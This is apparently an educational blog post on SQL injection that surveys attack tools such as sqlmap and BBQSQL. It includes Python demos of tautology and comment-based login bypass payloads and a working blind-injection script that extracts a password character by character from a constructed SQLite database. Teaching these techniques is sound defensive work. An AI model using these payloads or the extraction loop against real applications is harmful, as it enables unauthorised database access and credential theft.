What is SQL Injection?
First, what is SQL injection? SQL injection (SQLi) is one of the most common attacks against web applications. It happens when user-supplied input is pasted into a SQL statement as text, so the attacker can change the query the application sends to its database instead of merely supplying a value to it. A successful SQL injection attack can often read the entire database, including sensitive data such as usernames, e-mail addresses and password hashes, and, depending on the database and the privileges of the application account, may also modify data or reach the underlying server. SQL injection can be very harmful. Many SQL injection tools are available that automate finding and exploiting these flaws; the best known are listed below.
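To make the flaw concrete, here is an added example written for this page (not code from the post or from any of the tools listed below) using Python's built-in sqlite3 module. The two-row users table, the function names and the payloads are constructed for the example: one login function concatenates the request parameters into the query, the other passes them as parameters, and the same attacker input is sent to both.

```python
import sqlite3


# Constructed sample data standing in for a real application database
# (an assumption for this example, not from the original post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting, so anything the user types
    is parsed as SQL. This is the bug the tools on this page look for."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterised statement: the values travel separately from the SQL text,
    so a quote or comment marker inside them is data, never syntax."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def demo():
    conn = make_db()
    results = {}
    # Tautology payload: the vulnerable WHERE clause becomes
    #   username = 'nobody' AND password = '' OR '1'='1'
    # and AND binds tighter than OR, so every row matches.
    results["tautology_vulnerable"] = login_vulnerable(conn, "nobody", "' OR '1'='1")
    results["tautology_safe"] = login_safe(conn, "nobody", "' OR '1'='1")
    # Comment payload: '--' starts a SQL comment, discarding the password check,
    # so the attacker logs in as alice without knowing her password.
    results["comment_vulnerable"] = login_vulnerable(conn, "alice'--", "wrong")
    results["comment_safe"] = login_safe(conn, "alice'--", "wrong")
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable function returns both users for the tautology payload and alice's row for the comment payload; the parameterised function returns nothing for either, because the quote and the `--` are compared against the stored values as literal characters.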
List of top SQL Injection tools.
SQLMap:- sqlmap is a free and open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It is easy to use and so widely known that it is installed in Kali Linux by default; you can also download it directly from https://github.com/sqlmapproject/sqlmap
Features of sqlmap
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB and H2 database management systems.
- Full support for six SQL injection techniques: Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
SQLNinja:- sqlninja is another well-known SQL injection tool. Unlike sqlmap it targets only web applications backed by Microsoft SQL Server, and it does not run on Windows: it supports Linux, FreeBSD, Mac OS X and iOS.
JSQL:- jSQL Injection is a free and open-source lightweight application for finding and extracting database information from a vulnerable server. It is written in Java, hence the name, so it runs anywhere a Java runtime is available.
Sqlsus:- sqlsus is a free and open-source MySQL injection and takeover tool written in Perl. It is a fast database dumper for both in-band and blind injection. Through its command-line interface you can retrieve the database structure, inject your own SQL queries, and more. Download it from http://sqlsus.sourceforge.net/download.html
bbqsql:- BBQSQL is a blind SQL injection framework written in Python. Its workflow resembles the other tools above, but it is built specifically for blind injection, where the attacker sees no query output and only a true/false difference in the response, which makes it extremely useful against tricky blind SQL injection vulnerabilities. Starting it from a shell prints the following banner and menu:
# bbqsql
[BBQSQL ASCII-art banner, with a speech bubble reading ' or '1'='1 beneath it]
BBQSQL injection toolkit (bbqsql)
Lead Development: Ben Toews(mastahyeti)
Development: Scott Behrens(arbit)
Menu modified from code for Social Engineering Toolkit (SET) by: David Kennedy (ReL1K)
SET is located at: http://www.secmaniac.com(SET)
The 5 S's of BBQ:
Sauce, Spice, Smoke, Sizzle, and SQLi
Select from the menu:
1) Setup HTTP Parameters
2) Setup BBQSQL Options
3) Export Config
4) Import Config
5) Run Exploit
6) Help, Credits, and About
99) Exit the bbqsql injection toolkit
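sqlmap's Boolean-based blind technique and the BBQSQL framework above both automate the same inference loop: the attacker cannot read query output, only whether the page behaved as if the injected condition were true, and reconstructs data one character at a time from those yes/no answers. The following is an added example written for this page (not code from sqlmap, bbqsql or the original post) that runs that loop by hand against a constructed SQLite database. The products and users tables, the `page_shows_product` endpoint simulation, the known-valid id 1 and the target subquery are all assumptions for the example.

```python
import sqlite3


# Constructed sample database standing in for the target's back end
# (an assumption for this example, not from the post or from either tool).
def make_target_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cr3t!')")
    return conn


def page_shows_product(conn, item_id):
    """Simulated vulnerable endpoint: the id parameter is concatenated into the
    query, and the only thing the caller can observe is whether a product row
    came back (think of a 'product found' page versus an empty one)."""
    query = f"SELECT name FROM products WHERE id = {item_id}"
    return conn.execute(query).fetchone() is not None


def blind_length(oracle, target, max_len=64):
    """Find the secret's length by asking 'is length > n' for increasing n."""
    for n in range(max_len + 1):
        if not oracle(f"length({target}) > {n}"):
            return n
    raise ValueError("secret longer than max_len")


def blind_char(oracle, target, pos):
    """Recover one character with a binary search over printable ASCII (32..126).
    Each request halves the candidate range, so about 7 requests per character
    instead of up to 95 with a linear guess. unicode() and substr() are SQLite
    built-ins; other databases use ascii()/substring() for the same purpose."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr({target}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def blind_extract(conn, target="(SELECT password FROM users WHERE username = 'alice')"):
    """Drive the oracle to pull the whole secret out; returns (secret, requests)."""
    requests = 0

    def oracle(condition):
        nonlocal requests
        requests += 1
        # '1' is a known-valid id, so the page's answer now depends only on condition.
        return page_shows_product(conn, f"1 AND ({condition})")

    length = blind_length(oracle, target)
    secret = "".join(blind_char(oracle, target, pos) for pos in range(1, length + 1))
    return secret, requests


if __name__ == "__main__":
    secret, n = blind_extract(make_target_db())
    print(f"recovered {secret!r} in {n} true/false requests")
```

Every request sends an id of the form `1 AND (...)`; the page never returns the password, yet the seven-character secret comes back in well under a hundred requests. The tools on this page add what this sketch leaves out: detecting which parameter is injectable, telling true and false responses apart automatically, handling time-based variants where even the page content is identical, and adapting the string functions to each database engine.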
If you want to learn more about ethical hacking and CTF challenges, visit our YouTube channel "Vulnerable Machine Solution".